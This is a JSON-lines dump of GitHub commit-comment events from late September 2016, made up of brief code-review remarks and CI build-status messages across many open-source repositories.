{"id":"4637950665","type":"CommitCommentEvent","actor":{"login":"henrik"},"repo":{"name":"barsoom/review"},"payload":{"comment":{"id":19225746,"position":11,"line":46,"path":"config/dev.exs","commit_id":"1b8341854ab7eb1fd22645398ddd9fb7d50add1e","created_at":"2016-09-29T15:20:49Z","updated_at":"2016-09-29T15:20:49Z","body":"Elixir has `unless` if you prefer."}},"created_at":"2016-09-29T15:20:49Z"}
{"id":"4637953439","type":"CommitCommentEvent","actor":{"login":"AndreyTsvetkov"},"repo":{"name":"Traveler59/test"},"payload":{"comment":{"id":19225752,"position":30,"line":30,"path":"src/script.ts","commit_id":"11d39fe8a82a120adb0760e57dbf45bddca819c9","created_at":"2016-09-29T15:21:14Z","updated_at":"2016-09-29T15:21:14Z","body":"please follow the community codestyle for tabs (must be consistent everywhere) and for spaces `if ()`"}},"created_at":"2016-09-29T15:21:14Z"}
{"id":"4637954860","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19225755,"position":null,"line":null,"path":null,"commit_id":"370c8f58660614ee150d2ff80157e4ff04f429bc","created_at":"2016-09-29T15:21:27Z","updated_at":"2016-09-29T15:21:27Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1204](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14590&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 260, ignored: 3 Build time: 00:12:49"}},"created_at":"2016-09-29T15:21:27Z"}
{"id":"4637959410","type":"CommitCommentEvent","actor":{"login":"vicb"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":19225764,"position":16,"line":451,"path":"modules/@angular/compiler-cli/src/static_reflector.ts","commit_id":"b58e9ea7751a7be9e66012e26236e566b2a8b89b","created_at":"2016-09-29T15:22:07Z","updated_at":"2016-09-29T15:22:07Z","body":"Please create a new GH issue with a minimal repro. Thanks."}},"created_at":"2016-09-29T15:22:07Z"}
{"id":"4637960308","type":"CommitCommentEvent","actor":{"login":"zosrothko"},"repo":{"name":"bracketttc/poco"},"payload":{"comment":{"id":19225769,"position":null,"line":null,"path":null,"commit_id":"df8e0929083621ad4ed8359e3690efa38a300a27","created_at":"2016-09-29T15:22:19Z","updated_at":"2016-09-29T15:22:19Z","body":"is that a requirement for debian and fedora packages?\r\nFedora & Ubuntu packaging are using the Foundation/include/Poco/Config.h to add the \r\n```#define POCO_UNBUNDLED 1```\r\n\r\nyes, this is a mandatory requirement for the packaging be accepted by Fedora or Ubuntu to use th unbundled packaging.\r\n"}},"created_at":"2016-09-29T15:22:19Z"}
{"id":"4637961166","type":"CommitCommentEvent","actor":{"login":"Mantin-c"},"repo":{"name":"Mantin-c/ADO.NET--"},"payload":{"comment":{"id":19225772,"position":100,"line":100,"path":".gitignore","commit_id":"c798f07418a40ff73a8a16eb596620ba57c3744f","created_at":"2016-09-29T15:22:26Z","updated_at":"2016-09-29T15:22:26Z","body":"12"}},"created_at":"2016-09-29T15:22:26Z"}
{"id":"4637961877","type":"CommitCommentEvent","actor":{"login":"meltsufin"},"repo":{"name":"GoogleCloudPlatform/appengine-plugins-core"},"payload":{"comment":{"id":19225774,"position":null,"line":null,"path":null,"commit_id":"01781c8457d9bffd8368d1b8c260e990d943e7a4","created_at":"2016-09-29T15:22:32Z","updated_at":"2016-09-29T15:22:32Z","body":"@loosebazooka  PTAL"}},"created_at":"2016-09-29T15:22:32Z"}
{"id":"4637964134","type":"CommitCommentEvent","actor":{"login":"AndreyTsvetkov"},"repo":{"name":"Traveler59/test"},"payload":{"comment":{"id":19225785,"position":41,"line":41,"path":"src/script.ts","commit_id":"11d39fe8a82a120adb0760e57dbf45bddca819c9","created_at":"2016-09-29T15:22:52Z","updated_at":"2016-09-29T15:22:52Z","body":"here it's not a big deal, but we try to use more strong types, so `const` is better than `let`, if we do not need to change the value. IndeedBy the way, we rarely need."}},"created_at":"2016-09-29T15:22:52Z"}
{"id":"4637970206","type":"CommitCommentEvent","actor":{"login":"ptatian"},"repo":{"name":"NeighborhoodInfoDC/PresCat"},"payload":{"comment":{"id":19225807,"position":21,"line":313,"path":"Prog/New_Project_Geocode.sas","commit_id":"131239520b0b17c2745369a04df1e890944ccdcc","created_at":"2016-09-29T15:23:48Z","updated_at":"2016-09-29T15:23:48Z","body":"You still need the trim() function here. You need both trim() and left()."}},"created_at":"2016-09-29T15:23:48Z"}
{"id":"4637971670","type":"CommitCommentEvent","actor":{"login":"dgadelha"},"repo":{"name":"zf5/android_device_asus_ctp-common"},"payload":{"comment":{"id":19225811,"position":null,"line":null,"path":null,"commit_id":"7a3c50f66d386009671c36fde20e57a951ea30d4","created_at":"2016-09-29T15:24:02Z","updated_at":"2016-09-29T15:24:02Z","body":"Oh my god."}},"created_at":"2016-09-29T15:24:02Z"}
{"id":"4637973295","type":"CommitCommentEvent","actor":{"login":"loosebazooka"},"repo":{"name":"GoogleCloudPlatform/appengine-plugins-core"},"payload":{"comment":{"id":19225813,"position":null,"line":null,"path":null,"commit_id":"01781c8457d9bffd8368d1b8c260e990d943e7a4","created_at":"2016-09-29T15:24:16Z","updated_at":"2016-09-29T15:24:16Z","body":":ship: "}},"created_at":"2016-09-29T15:24:16Z"}
{"id":"4637974280","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19225816,"position":null,"line":null,"path":null,"commit_id":"bf562a9dac50680ab6c5948506016a2d873d1d66","created_at":"2016-09-29T15:24:24Z","updated_at":"2016-09-29T15:24:24Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1208](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14597&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-29T15:24:24Z"}
{"id":"4637979342","type":"CommitCommentEvent","actor":{"login":"PromoFaux"},"repo":{"name":"pi-hole/pi-hole"},"payload":{"comment":{"id":19225827,"position":null,"line":null,"path":null,"commit_id":"cd30a7533efb01f180ae96e3b3833c04ac94b852","created_at":"2016-09-29T15:25:12Z","updated_at":"2016-09-29T15:25:12Z","body":"I also need the package name for `php-sqlite` in `yum`. @dschaper / @bcambl ?"}},"created_at":"2016-09-29T15:25:12Z"}
{"id":"4637980756","type":"CommitCommentEvent","actor":{"login":"ptatian"},"repo":{"name":"NeighborhoodInfoDC/PresCat"},"payload":{"comment":{"id":19225830,"position":94,"line":473,"path":"Prog/New_Project_Geocode.sas","commit_id":"131239520b0b17c2745369a04df1e890944ccdcc","created_at":"2016-09-29T15:25:25Z","updated_at":"2016-09-29T15:25:25Z","body":"I changed the comments into titles so that they would show up in the output, where the user would be more l likely to see them. Also numbered each Proc Compare run so that it was easier to distinguish them. "}},"created_at":"2016-09-29T15:25:25Z"}
{"id":"4637986908","type":"CommitCommentEvent","actor":{"login":"e0003892"},"repo":{"name":"CS2103AUG2016-F09-C2/addressbook-level3"},"payload":{"comment":{"id":19225849,"position":null,"line":null,"path":null,"commit_id":"2b18be53af2f0c53b8360b69cf252d6c73ad10e4","created_at":"2016-09-29T15:26:23Z","updated_at":"2016-09-29T15:26:23Z","body":"![image](https://cloud.githubusercontent.com/assets/21215803/18960386/1f0c243c-869c-11e6-91bc-bbb925c015e7.png)\r\n"}},"created_at":"2016-09-29T15:26:23Z"}
{"id":"4637988002","type":"CommitCommentEvent","actor":{"login":"vietlq"},"repo":{"name":"truongngodang/weekly"},"payload":{"comment":{"id":19225850,"position":null,"line":null,"path":null,"commit_id":"98ccacfb361bf41fac5f7fd8675d53348799bc53","created_at":"2016-09-29T15:26:34Z","updated_at":"2016-09-29T15:26:34Z","body":"Looks good. Feel free to submit a pull request ;)"}},"created_at":"2016-09-29T15:26:34Z"}
{"id":"4637990743","type":"CommitCommentEvent","actor":{"login":"yma88"},"repo":{"name":"yma88/indy"},"payload":{"comment":{"id":19225857,"position":null,"line":null,"path":null,"commit_id":"4ff5c7c22f245bb799793f8385609cdebb33a0c5","created_at":"2016-09-29T15:26:59Z","updated_at":"2016-09-29T15:26:59Z","body":"@jdcasey\r\n\r\nPls help to check this, I found all the dependencies needed for a valid check (AutoProxDataManagerDecorator#checkValidity) is in indy-api module which is dependent on indy-model-core-java, while if we wanna add the url check for RemoteRepository (which is in the module of indy-model-core-java), we should avoid the 'cyclic reference', so I had a thought like this, create another ValidRemoteRepository extends RemoteRepository, but what we should do next are replacing all the RemoteRepository into ValidRemoteRepository, I'm not sure whether this is a good practice for resolving the issue."}},"created_at":"2016-09-29T15:26:59Z"}
{"id":"4637992255","type":"CommitCommentEvent","actor":{"login":"e0003892"},"repo":{"name":"CS2103AUG2016-F09-C2/addressbook-level3"},"payload":{"comment":{"id":19225862,"position":null,"line":null,"path":null,"commit_id":"2b18be53af2f0c53b8360b69cf252d6c73ad10e4","created_at":"2016-09-29T15:27:13Z","updated_at":"2016-09-29T15:27:13Z","body":"<img width=\"612\" alt=\"gui\" src=\"https://cloud.githubusercontent.com/assets/21215803/18960416/3d05afd0-869c-11e6-9f81-b23e8621cd32.png\">\r\n"}},"created_at":"2016-09-29T15:27:13Z"}
{"id":"4637994491","type":"CommitCommentEvent","actor":{"login":"vietlq"},"repo":{"name":"MVDCA/weekly"},"payload":{"comment":{"id":19225867,"position":7,"line":7,"path":"week0001/FizzBuzz_mvdca.php","commit_id":"76dcf5cbe5f19ff02b502a79334d01894a7ffbcc","created_at":"2016-09-29T15:27:33Z","updated_at":"2016-09-29T15:27:33Z","body":"There was no requirement to print a new line before `Fizz` & `Buzz`"}},"created_at":"2016-09-29T15:27:33Z"}
{"id":"4637996283","type":"CommitCommentEvent","actor":{"login":"vietlq"},"repo":{"name":"MVDCA/weekly"},"payload":{"comment":{"id":19225873,"position":15,"line":15,"path":"week0001/FizzBuzz_mvdca.php","commit_id":"76dcf5cbe5f19ff02b502a79334d01894a7ffbcc","created_at":"2016-09-29T15:27:51Z","updated_at":"2016-09-29T15:27:51Z","body":"There was no requirement to print `$i` ;)"}},"created_at":"2016-09-29T15:27:51Z"}
{"id":"4637999191","type":"CommitCommentEvent","actor":{"login":"vpswede"},"repo":{"name":"Albin-Eriksson/ARPGamingDev.Altis"},"payload":{"comment":{"id":19225881,"position":null,"line":null,"path":null,"commit_id":"fe1217681ff8c94cc2d3c3f22c1cfb2df78a0159","created_at":"2016-09-29T15:28:16Z","updated_at":"2016-09-29T15:28:16Z","body":"vad är detta för något? ny admin meny eller what?"}},"created_at":"2016-09-29T15:28:16Z"}
{"id":"4638000422","type":"CommitCommentEvent","actor":{"login":"vietlq"},"repo":{"name":"MVDCA/weekly"},"payload":{"comment":{"id":19225884,"position":5,"line":5,"path":"week0001/FizzBuzz_mvdca.php","commit_id":"76dcf5cbe5f19ff02b502a79334d01894a7ffbcc","created_at":"2016-09-29T15:28:27Z","updated_at":"2016-09-29T15:28:27Z","body":"This condition is wrong."}},"created_at":"2016-09-29T15:28:27Z"}
{"id":"4638001992","type":"CommitCommentEvent","actor":{"login":"vietlq"},"repo":{"name":"MVDCA/weekly"},"payload":{"comment":{"id":19225890,"position":9,"line":9,"path":"week0001/FizzBuzz_mvdca.php","commit_id":"76dcf5cbe5f19ff02b502a79334d01894a7ffbcc","created_at":"2016-09-29T15:28:42Z","updated_at":"2016-09-29T15:28:42Z","body":"This condition is wrong."}},"created_at":"2016-09-29T15:28:42Z"}
{"id":"4638008323","type":"CommitCommentEvent","actor":{"login":"vietlq"},"repo":{"name":"MVDCA/weekly"},"payload":{"comment":{"id":19225907,"position":null,"line":null,"path":null,"commit_id":"76dcf5cbe5f19ff02b502a79334d01894a7ffbcc","created_at":"2016-09-29T15:29:29Z","updated_at":"2016-09-29T15:29:29Z","body":"Thanks for attempting the quiz. Please feel free to submit a pull request :+1: "}},"created_at":"2016-09-29T15:29:29Z"}
{"id":"4638009800","type":"CommitCommentEvent","actor":{"login":"klickverbot"},"repo":{"name":"weka-io/ldc"},"payload":{"comment":{"id":19225913,"position":24,"line":111,"path":"driver/linker.cpp","commit_id":"c1fadc936a12ce544064f94912daeee4c36079b7","created_at":"2016-09-29T15:29:40Z","updated_at":"2016-09-29T15:29:40Z","body":"I don't think `codeGenOptLevel` really is the correct criterion to use here – unless I'm mistaken, this should be set from the main `-O0` … `-O3` options."}},"created_at":"2016-09-29T15:29:40Z"}
{"id":"4638011350","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19225917,"position":null,"line":null,"path":null,"commit_id":"ca517c1d5e053cde679ad6f2f72f1623f4f8191e","created_at":"2016-09-29T15:29:53Z","updated_at":"2016-09-29T15:29:53Z","body":"just built fine and booted...\r\ni dont have baseband tho but i got no time to check for now..."}},"created_at":"2016-09-29T15:29:53Z"}
{"id":"4638013974","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19225928,"position":null,"line":null,"path":null,"commit_id":"4b5ec2629a037b2b1aed1a2a1172aaf6debbed4a","created_at":"2016-09-29T15:30:17Z","updated_at":"2016-09-29T15:30:17Z","body":"Ugh, we need to deduplicate some of this!\r\nI think ` mx.jruby/suite.py` could be the one true source for it."}},"created_at":"2016-09-29T15:30:17Z"}
{"id":"4638020048","type":"CommitCommentEvent","actor":{"login":"tank0412"},"repo":{"name":"zf5/android_device_asus_ctp-common"},"payload":{"comment":{"id":19225943,"position":null,"line":null,"path":null,"commit_id":"7a3c50f66d386009671c36fde20e57a951ea30d4","created_at":"2016-09-29T15:31:10Z","updated_at":"2016-09-29T15:31:10Z","body":"???\r\n:confused:\r\nI know that this kernel will not pass OEM logo because wee need mkbootimg which support osip.\r\nBut i need it to get ramdisk with N bring up.\r\nBTW, it rebooting to recovery due to N init.rc.\r\nIt is strange"}},"created_at":"2016-09-29T15:31:10Z"}
{"id":"4638020541","type":"CommitCommentEvent","actor":{"login":"Neftedollar"},"repo":{"name":"semionlaptev/Airplain"},"payload":{"comment":{"id":19225945,"position":null,"line":null,"path":null,"commit_id":"2148eb41e4bda58aaba65caa518876f9782e4787","created_at":"2016-09-29T15:31:16Z","updated_at":"2016-09-29T15:31:16Z","body":"Плохой коммит)"}},"created_at":"2016-09-29T15:31:16Z"}
{"id":"4638022136","type":"CommitCommentEvent","actor":{"login":"bompeacock"},"repo":{"name":"bompeacock/ScheduleApp"},"payload":{"comment":{"id":19225950,"position":null,"line":null,"path":null,"commit_id":"5ab4a22b71917736254f3697103988afcf1eb8ba","created_at":"2016-09-29T15:31:29Z","updated_at":"2016-09-29T15:31:29Z","body":"# Pre-work - *Schedule App*\r\n\r\n**Schedule App** is an android app that allows building a todo list and basic todo items management functionality including adding new items, editing and deleting an existing item.\r\n\r\nSubmitted by: **Nguyen Van Cong**\r\n\r\nTime spent: **three** yes spent in total\r\n\r\n## User Stories\r\n\r\nThe following **required** functionality is completed:\r\n\r\n* [ ] User can **sort by view Level or Date** from the todo list to see easily\r\n* [ ] User can **successfully add and remove items** from the todo list\r\n* [ ] User can **tap a todo item in the list and bring up an edit screen for the todo item** and then have any changes to the text reflected in the todo list.\r\n* [ ] User can **persist todo items** and retrieve them properly on app restart\r\n\r\nThe following **optional** features are implemented:\r\n\r\n* [ ] Persist the todo items [into SQLite](http://guides.codepath.com/android/Persisting-Data-to-the-Device#sqlite) instead of a text file\r\n* [ ] Improve style of the todo items in the list [using a custom adapter](http://guides.codepath.com/android/Using-an-ArrayAdapter-with-ListView)\r\n* [ ] Add support for completion due dates for todo items (and display within listview item)\r\n* [ ] Use a [DialogFragment](http://guides.codepath.com/android/Using-DialogFragment) instead of new Activity for editing items\r\n* [ ] Add support for selecting the priority of each todo item (and display in listview item)\r\n* [ ] Tweak the style improving the UI / UX, play with colors, images or backgrounds\r\n\r\nThe following **additional** features are implemented:\r\n\r\n* [ ] List anything else that you can get done to improve the app functionality!\r\n\r\n## Video Walkthrough \r\n\r\nHere's a walkthrough of implemented user stories:\r\n\r\n<img src='http://i.imgur.com/link/to/your/gif/file.gif' title='Video Walkthrough' width='' alt='Video Walkthrough' />"}},"created_at":"2016-09-29T15:31:29Z"}
{"id":"4638024017","type":"CommitCommentEvent","actor":{"login":"katsoo2"},"repo":{"name":"katsoo2/Hello-world"},"payload":{"comment":{"id":19225956,"position":null,"line":null,"path":null,"commit_id":"0a5d1f99230554b09ce602ad9345cc7da2b8dcfa","created_at":"2016-09-29T15:31:45Z","updated_at":"2016-09-29T15:31:45Z","body":"What happened to giving to the poor?"}},"created_at":"2016-09-29T15:31:45Z"}
{"id":"4638028286","type":"CommitCommentEvent","actor":{"login":"zyxue"},"repo":{"name":"donkirkby/pinyincushion"},"payload":{"comment":{"id":19225964,"position":38,"line":57,"path":"src/charData.js","commit_id":"9a9d6216c92c72ee2554a5d88eaa3552f8461fb8","created_at":"2016-09-29T15:32:21Z","updated_at":"2016-09-29T15:32:21Z","body":"Do you think if it's necessary to use punycode to get the length as in [`punycode.ucs2.decode(this.props.text)`](https://github.com/donkirkby/pinyincushion/blob/master/src/PinyinCushionEditor.js#L90). Some text like `\"𠮷\"` has a length of 2. But 𠮷 is not a Chinese character as far as I know. Also, I have checked all characters in https://github.com/donkirkby/pinyincushion/blob/master/charData/char_freq.txt only has a length of 1, but the user may enter anything."}},"created_at":"2016-09-29T15:32:21Z"}
{"id":"4638035498","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19225983,"position":null,"line":null,"path":null,"commit_id":"bf562a9dac50680ab6c5948506016a2d873d1d66","created_at":"2016-09-29T15:33:27Z","updated_at":"2016-09-29T15:33:27Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1208](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14597&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 259, ignored: 3 Build time: 00:09:02"}},"created_at":"2016-09-29T15:33:27Z"}
{"id":"4638036979","type":"CommitCommentEvent","actor":{"login":"jrieken"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":19225988,"position":6,"line":4,"path":"extensions/git/git-commit.language-configuration.json","commit_id":"63efb8490163554455182a3b64cbe821e9d7e1c0","created_at":"2016-09-29T15:33:39Z","updated_at":"2016-09-29T15:33:39Z","body":"@bpasero unsure if block comments make sense there?"}},"created_at":"2016-09-29T15:33:39Z"}
{"id":"4638038269","type":"CommitCommentEvent","actor":{"login":"FrechMax"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19225991,"position":56,"line":56,"path":"plugins/de.ovgu.featureide.fm.ui/src/de/ovgu/featureide/fm/ui/editors/featuremodel/operations/FoldInOperation.java","commit_id":"1d5d9ffdfba0969358a2a263073f811a5b2505be","created_at":"2016-09-29T15:33:50Z","updated_at":"2016-09-29T15:33:50Z","body":"Documentation should be added :-1: "}},"created_at":"2016-09-29T15:33:50Z"}
{"id":"4638041823","type":"CommitCommentEvent","actor":{"login":"fviale"},"repo":{"name":"ow2-proactive/scheduling"},"payload":{"comment":{"id":19226006,"position":null,"line":null,"path":null,"commit_id":"e65af4a8676320db2339c55cf473ecd43ad1c9a2","created_at":"2016-09-29T15:34:22Z","updated_at":"2016-09-29T15:34:22Z","body":"To avoid that the test would fail if someone decides to change some error messages, I strongly suggest to put all error messages in public static string and reuse them in the tests"}},"created_at":"2016-09-29T15:34:22Z"}
{"id":"4638046228","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19226018,"position":null,"line":null,"path":null,"commit_id":"b5ca455258a17004b331756b5d1354a5bb7d4486","created_at":"2016-09-29T15:35:00Z","updated_at":"2016-09-29T15:35:00Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1209](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14603&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-29T15:35:00Z"}
{"id":"4638048348","type":"CommitCommentEvent","actor":{"login":"KenanSulayman"},"repo":{"name":"indix/matsya"},"payload":{"comment":{"id":19226028,"position":46,"line":46,"path":"src/main/scala/in/ashwanthkumar/matsya/config/Config.scala","commit_id":"ff8a4d125cefadc9bc92ec3ddaf5e7e5876dc8b5","created_at":"2016-09-29T15:35:19Z","updated_at":"2016-09-29T15:35:19Z","body":"y u do dis\r\n\r\n😢 "}},"created_at":"2016-09-29T15:35:19Z"}
{"id":"4638049390","type":"CommitCommentEvent","actor":{"login":"smd686s"},"repo":{"name":"google/material-design-lite"},"payload":{"comment":{"id":19226030,"position":null,"line":null,"path":null,"commit_id":"4944037bcd7099521687b6148a85594a57926e0f","created_at":"2016-09-29T15:35:27Z","updated_at":"2016-09-29T15:35:27Z","body":"1.2.1 fixed for us, @Allanramirez1 "}},"created_at":"2016-09-29T15:35:27Z"}
{"id":"4638050111","type":"CommitCommentEvent","actor":{"login":"buckfever89"},"repo":{"name":"buckfever89/testing"},"payload":{"comment":{"id":19226034,"position":null,"line":null,"path":null,"commit_id":"e6884bd7a501cb8ff2e143c3d5b483de51721f78","created_at":"2016-09-29T15:35:33Z","updated_at":"2016-09-29T15:35:33Z","body":"what is this? its not ok"}},"created_at":"2016-09-29T15:35:33Z"}
{"id":"4638051369","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"cai799174/OpenStudio"},"payload":{"comment":{"id":19226042,"position":null,"line":null,"path":null,"commit_id":"33723b471757d30ef9cd4de3fcf826595ced4ee4","created_at":"2016-09-29T15:35:43Z","updated_at":"2016-09-29T15:35:43Z","body":"1973-AddDualDuctTerminals (cai799174) - i386-Windows-7-VisualStudio-12: OK (2417 of 2447 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-33723b471757d30ef9cd4de3fcf826595ced4ee4-PR2358-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-33723b471757d30ef9cd4de3fcf826595ced4ee4-PR2358-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.77%25-yellow.svg)</a> \n"}},"created_at":"2016-09-29T15:35:43Z"}
{"id":"4638053771","type":"CommitCommentEvent","actor":{"login":"buckfever89"},"repo":{"name":"buckfever89/testing"},"payload":{"comment":{"id":19226048,"position":5,"line":6,"path":"Hello_People.txt","commit_id":"e6884bd7a501cb8ff2e143c3d5b483de51721f78","created_at":"2016-09-29T15:36:07Z","updated_at":"2016-09-29T15:36:07Z","body":"what the hell are y saing?"}},"created_at":"2016-09-29T15:36:07Z"}
{"id":"4638061965","type":"CommitCommentEvent","actor":{"login":"doiphode"},"repo":{"name":"doiphode/moodle_local_mass_enroll"},"payload":{"comment":{"id":19226069,"position":null,"line":null,"path":null,"commit_id":"4f8de9743628803ef360126f7b17663da7a661b7","created_at":"2016-09-29T15:37:22Z","updated_at":"2016-09-29T15:37:22Z","body":"There was a small bug in the code that was leading to a serious problem. If there is a blank record in the CSV, the plugin tries to match with existing blank idnumbers, email address or username in user table and enrols the very first blank record, in which case the Guest gets enrolled because it is before everyone in the mdl_user table whose idnumber is blank."}},"created_at":"2016-09-29T15:37:22Z"}
{"id":"4638075172","type":"CommitCommentEvent","actor":{"login":"matthewbauer"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19226095,"position":null,"line":null,"path":null,"commit_id":"c5ddb7dd56d9eb71cbe0430bcf85596d298caef8","created_at":"2016-09-29T15:39:20Z","updated_at":"2016-09-29T15:39:20Z","body":"This gives an evaluation error:\r\n\r\n```\r\nerror: while evaluating ‘callPackageWith’ at /Users/mbauer/.nox/nixpkgs/lib/customisation.nix:93:35, called from /Users/mbauer/.nox/nixpkgs/pkgs/top-level/all-packages.nix:11091:13:\r\nwhile evaluating ‘makeOverridable’ at /Users/mbauer/.nox/nixpkgs/lib/customisation.nix:54:24, called from /Users/mbauer/.nox/nixpkgs/lib/customisation.nix:97:8:\r\nanonymous function at /Users/mbauer/.nox/nixpkgs/pkgs/os-specific/linux/pam_usb/default.nix:1:1 called without required argument ‘useSetUID’, at /Users/mbauer/.nox/nixpkgs/lib/customisation.nix:56:12\r\n```"}},"created_at":"2016-09-29T15:39:20Z"}
{"id":"4638077460","type":"CommitCommentEvent","actor":{"login":"matthewbauer"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19226103,"position":2,"line":1,"path":"pkgs/os-specific/linux/pam_usb/default.nix","commit_id":"c5ddb7dd56d9eb71cbe0430bcf85596d298caef8","created_at":"2016-09-29T15:39:39Z","updated_at":"2016-09-29T15:39:39Z","body":"useSetUID can be removed"}},"created_at":"2016-09-29T15:39:39Z"}
{"id":"4638081751","type":"CommitCommentEvent","actor":{"login":"bracketttc"},"repo":{"name":"bracketttc/poco"},"payload":{"comment":{"id":19226110,"position":null,"line":null,"path":null,"commit_id":"df8e0929083621ad4ed8359e3690efa38a300a27","created_at":"2016-09-29T15:40:19Z","updated_at":"2016-09-29T15:40:19Z","body":"Are the distro packaging scripts part of the repository?\r\n\r\nThe point of my question was more asking is it necessary to use a `configure` shell script that doesn't just redirect to CMake? What makes it desirable to maintain multiple build systems?\r\n\r\nAside:\r\n`POCO_UNBUNDLED` is a CMake option as well. Adding\r\n```#cmakedefine POCO_UNBUNDLED```\r\nto Foundation/include/Poco/Config.h.in instead of adding `-DPOCO_UNBUNDLED`/`/DPOCO_UNBUNDLED` to the command-line of every compilation unit would reduce rebuild times in the CMake builds when that option changes, assuming that every place in the code that requires the `POCO_UNBUNDLED` preprocessor flag includes Config.h ( which seems a safe bet if the distro package requirements on that front are met by setting it there."}},"created_at":"2016-09-29T15:40:19Z"}
{"id":"4638081908","type":"CommitCommentEvent","actor":{"login":"lastperson"},"repo":{"name":"Ambisafe/provider-engine"},"payload":{"comment":{"id":19226111,"position":null,"line":null,"path":null,"commit_id":"db27b6872e03817d98a7cd036880604fc86dd2d6","created_at":"2016-09-29T15:40:20Z","updated_at":"2016-09-29T15:40:20Z","body":"@kumavis yeah, when we stumbled upon this problem, I didn't check the latest changes in provider-engine, and thought it is not there yet, so I just made a patch to make our services work. We will now switch back to the main repo :)"}},"created_at":"2016-09-29T15:40:20Z"}
{"id":"4638087484","type":"CommitCommentEvent","actor":{"login":"deadlybutter"},"repo":{"name":"DoSomething/onboarding-service"},"payload":{"comment":{"id":19226123,"position":5,"line":5,"path":"README.md","commit_id":"9e1d3c4da6a4ca010971ebe837f5ff27e01aba29","created_at":"2016-09-29T15:41:11Z","updated_at":"2016-09-29T15:41:11Z","body":"I think it would work fine in a vagrant box, just want a priority for me right now to get it running"}},"created_at":"2016-09-29T15:41:11Z"}
{"id":"4638088150","type":"CommitCommentEvent","actor":{"login":"derrell"},"repo":{"name":"qooxdoo/qooxdoo"},"payload":{"comment":{"id":19226126,"position":6,"line":142,"path":"framework/source/class/qx/util/DynamicScriptLoader.js","commit_id":"1c4087588730006f23b3561cc666bc3e9b647606","created_at":"2016-09-29T15:41:17Z","updated_at":"2016-09-29T15:41:17Z","body":"Just to be nitpicky... should that be translatable?\r\n\r\n```\r\n throw new Error(this.tr('you can only call start once per instance'));\r\n```"}},"created_at":"2016-09-29T15:41:17Z"}
{"id":"4638093301","type":"CommitCommentEvent","actor":{"login":"perdjurner"},"repo":{"name":"driftyco/ionic"},"payload":{"comment":{"id":19226133,"position":null,"line":null,"path":null,"commit_id":"3671f3023bdf2a23d624076d5ddc343d6bc244a0","created_at":"2016-09-29T15:41:58Z","updated_at":"2016-09-29T15:41:58Z","body":"Thanks, sorry about that.\r\n\r\nI don't think you need to import pipes and custom components though, just providers, right?"}},"created_at":"2016-09-29T15:41:58Z"}
{"id":"4638093597","type":"CommitCommentEvent","actor":{"login":"derrell"},"repo":{"name":"qooxdoo/qooxdoo"},"payload":{"comment":{"id":19226134,"position":6,"line":142,"path":"framework/source/class/qx/util/DynamicScriptLoader.js","commit_id":"1c4087588730006f23b3561cc666bc3e9b647606","created_at":"2016-09-29T15:42:03Z","updated_at":"2016-09-29T15:42:03Z","body":"No, probably not. It's a developer error, not one for users."}},"created_at":"2016-09-29T15:42:03Z"}
{"id":"4638108694","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19226157,"position":null,"line":null,"path":null,"commit_id":"1a9714483ac527ec3f65b9c135bae8717851e403","created_at":"2016-09-29T15:44:21Z","updated_at":"2016-09-29T15:44:21Z","body":"input_processor_refactor (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Tests Failed (1857 of 2401 tests passed, 22 test warnings)\n\n * 509 tests had: AUD diffs.\n * 493 tests had: EIO diffs.\n * 471 tests had: Table big diffs.\n * 369 tests had: MTD diffs.\n * 211 tests had: RDD diffs.\n * 136 tests had: ERR diffs.\n * 272 tests had: DXF diffs.\n * 391 tests had: SHD diffs.\n * 407 tests had: BND diffs.\n * 296 tests had: MDD diffs.\n * 185 tests had: SSZ big diffs.\n * 14 tests had: ESO big diffs.\n * 9 tests had: MTR big diffs.\n * 8 tests had: ZSZ small diffs.\n * 28 tests had: ESO small diffs.\n * 22 tests had: MTR small diffs.\n * 1 test had: MDD di...\n * 3 tests had: delightin diffs.\n * 3 tests had: delightout diffs.\n * 1 test had: SHD diffs....\n\n\n<a 